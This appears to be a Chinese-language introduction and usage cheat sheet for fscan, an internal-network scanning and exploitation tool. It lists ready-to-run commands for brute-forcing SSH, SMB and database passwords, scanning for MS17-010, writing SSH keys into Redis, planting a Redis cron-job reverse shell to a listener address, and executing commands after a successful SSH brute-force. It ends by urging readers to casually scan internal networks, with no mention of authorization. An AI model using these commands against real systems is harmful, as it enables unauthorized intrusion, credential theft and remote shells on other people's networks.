fscan簡介

一款內網綜合掃描工具，方便一鍵自動化、全方位漏掃掃描。
支援主機存活探測、埠掃描、常見服務的爆破、ms17010、redis批量寫公鑰、計劃任務反彈shell、讀取win網絡卡資訊、web指紋識別、web漏洞掃描、netbios探測、域控識別等功能

主要功能

1.資訊蒐集:

• 存活探測(icmp)
• 埠掃描

2.爆破功能:

• 各類服務爆破(ssh、smb等)
• 資料庫密碼爆破(mysql、mssql、redis、psql等)

3.系統資訊、漏洞掃描:

• netbios探測、域控識別
• 獲取目標網絡卡資訊
• 高危漏洞掃描(ms17010等)

4.Web探測功能:

• webtitle探測
• web指紋識別(常見cms、oa框架等)
• web漏洞掃描(weblogic、st2等,支援xray的poc)

5.漏洞利用:

• redis寫公鑰或寫計劃任務
• ssh命令執行

6.其他功能:

• 檔案儲存

usege

簡單用法

fscan.exe -h 192.168.1.1/24  (預設使用全部模組)
fscan.exe -h 192.168.1.1/16  (B段掃描)

其他用法

fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳過存活檢測 、不儲存檔案、跳過web poc掃描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 寫公鑰)
fscan
 
.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 計劃任務反彈shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功後，命令執行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模組ssh和埠)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (載入指定檔案的使用者名稱、密碼來進行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定掃描結果儲存路徑,預設儲存在當前路徑) 
fscan
 
.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速檢視網段資訊 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密碼碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模組)
fscan.exe -hf ip.txt  (以檔案匯入)
fscan.exe -u http://baidu.com -proxy 8080 (掃描單個url,並設定http代理 http://127.0.0.1:8080)

牛就完了！

隨便傻瓜式掃一下內網

官方文件以及fscan下載連結 https://github.com/shadow1ng/fscan